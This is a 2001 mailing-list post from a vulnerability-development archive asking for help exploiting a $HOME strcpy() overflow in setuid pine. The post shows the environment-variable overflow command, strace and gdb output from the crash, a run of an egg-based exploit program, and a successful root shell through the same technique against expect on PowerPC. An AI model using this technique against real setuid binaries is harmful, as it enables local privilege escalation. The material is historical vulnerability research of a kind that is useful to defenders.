Vulnerability Development mailing list archives
Pine
From: Charles Stevenson <core () ezlink com>
Date: Wed, 11 Jul 2001 20:56:51 -0600
Hi all, Has anyone ever coded a pine exploit. I know it's vulnerable to a $HOME strcpy() problem. And I have seen it suid this or that on several ISPs even though it shouldn't be ever! What are the implications of this with pine itself can you simply run a command from within it. I don't think pine was designed to be run as a suid and I'm not sure why anyone would give it such permissions. [-(root@devastator:~/bleedingedge)> export HOME=`perl -e 'print "i" x 6969'` [-(:1-07-11-20:20:51)-]<p0> [-(root@devastator:/home/core/bleedingedge)> pine [-(:1-07-11-20:21:10)-]<p0> zsh: segmentation fault pine [-(root@devastator:/home/core/bleedingedge)> strace pine [-(:1-07-11-20:21:12)-]<p0> execve("/usr/bin/pine", ["pine"], [/* 20 vars */]) = 0 mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40007000 mprotect(0x40000000, 20353, PROT_READ|PROT_WRITE|PROT_EXEC) = 0 mprotect(0x8048000, 1352085, PROT_READ|PROT_WRITE|PROT_EXEC) = 0 stat("/etc/ld.so.cache", {st_mode=S_IFREG|0644, st_size=8183, ...}) = 0 open("/etc/ld.so.cache", O_RDONLY) = 3 mmap(0, 8183, PROT_READ, MAP_SHARED, 3, 0) = 0x40008000 close(3) = 0 stat("/etc/ld.so.preload", 0xbfffe180) = -1 ENOENT (No such file or directory) open("/lib/libtermcap.so.2", O_RDONLY) = 3 read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3"..., 4096) = 4096 mmap(0, 12288, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4000a000 mmap(0x4000a000, 7276, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0x4000a000 mmap(0x4000c000, 3496, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x1000) = 0x4000c000 close(3) = 0 mprotect(0x4000a000, 7276, PROT_READ|PROT_WRITE|PROT_EXEC) = 0 open("/lib/libc.so.5", O_RDONLY) = 3 read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3"..., 4096) = 4096 mmap(0, 831488, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4000d000 mmap(0x4000d000, 599154, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0x4000d000 mmap(0x400a0000, 22664, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x92000) = 0x400a0000 mmap(0x400a6000, 200812, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x400a6000 close(3) = 0 mprotect(0x4000d000, 599154, PROT_READ|PROT_WRITE|PROT_EXEC) = 0 munmap(0x40008000, 8183) = 0 mprotect(0x8048000, 1352085, PROT_READ|PROT_EXEC) = 0 mprotect(0x4000a000, 7276, PROT_READ|PROT_EXEC) = 0 mprotect(0x4000d000, 599154, PROT_READ|PROT_EXEC) = 0 mprotect(0x40000000, 20353, PROT_READ|PROT_EXEC) = 0 personality(PER_LINUX) = 0 geteuid() = 0 getuid() = 0 getgid() = 0 getegid() = 11 brk(0x81abb88) = 0x81abb88 brk(0x81ac000) = 0x81ac000 getpid() = 21010 time(NULL) = 994904475 getuid() = 0 open("/etc/nsswitch.conf", O_RDONLY) = 3 brk(0x81af000) = 0x81af000 fstat(3, {st_mode=S_IFREG|0644, st_size=1215, ...}) = 0 mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40008000 read(3, "#\n# /etc/nsswitch.conf\n#\n# An"..., 4096) = 1215 read(3, "", 4096) = 0 close(3) = 0 munmap(0x40008000, 4096) = 0 open("/etc/passwd", O_RDONLY) = 3 fstat(3, {st_mode=S_IFREG|0644, st_size=28709, ...}) = 0 mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40008000 read(3, "root:x:0:0::/root:/bin/sh\ndaemo"..., 4096) = 4096 lseek(3, -4070, SEEK_CUR) = 26 close(3) = 0 munmap(0x40008000, 4096) = 0 brk(0x81b1000) = 0x81b1000 ioctl(0, TCGETS, {B38400 opost isig icanon echo ...}) = 0 --- SIGSEGV (Segmentation fault) --- +++ killed by SIGSEGV +++ [-(root@devastator:~/bleedingedge/test)> ./exploit4 [-(:1-07-11-20:34:22)-]<p0> Using address: 0xbffffcc4 [root@devastator ~/bleedingedge/test]# export HOME=$EGG [root@devastator /home/core/bleedingedge/test]# gdb pine GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details. GDB 4.16 (i586-unknown-linux), Copyright 1996 Free Software Foundation, Inc... (gdb) r Starting program: /usr/bin/pine zsh: path too long: .zshenv Program received signal SIGSEGV, Segmentation fault. 0x4007a43f in strcpy () (gdb) bt #0 0x4007a43f in strcpy () #1 0x804a590 in _start () #2 0x90909090 in ?? () Cannot access memory at address 0x90909090. (gdb) frame 0 #0 0x4007a43f in strcpy () (gdb) list pine.c:252: No such file or directory. Also I'm not quite understanding coding overflows on x86. I cant seem to overwrite the eip and my attempts on expect and pine both segfault. Can someone tell me what I'm missing. It's harder but easier on ppc arch. :) I mean it works so well on my iBook! [ Buffer size: 512 Egg size: 2048 Aligment: 0] [ Address: 0x100111f8 Offset: 0 ] sh-2.05$ export HOME=$EGG sh-2.05$ expect sh-2.05# id uid=0(root) gid=1000(core) groups=1000(core),4(adm),24(cdrom),29(audio),30(dip) sh-2.05# I don't feel like building pine for ppc but I'm sure it's just as simple. Thanks in advance for any x86 help. Best Regards, Charles Stevenson
Current thread:
- Pine Charles Stevenson (Jul 12)
- <Possible follow-ups>
- Re: Pine kernel51 () libertysurf fr (Jul 13)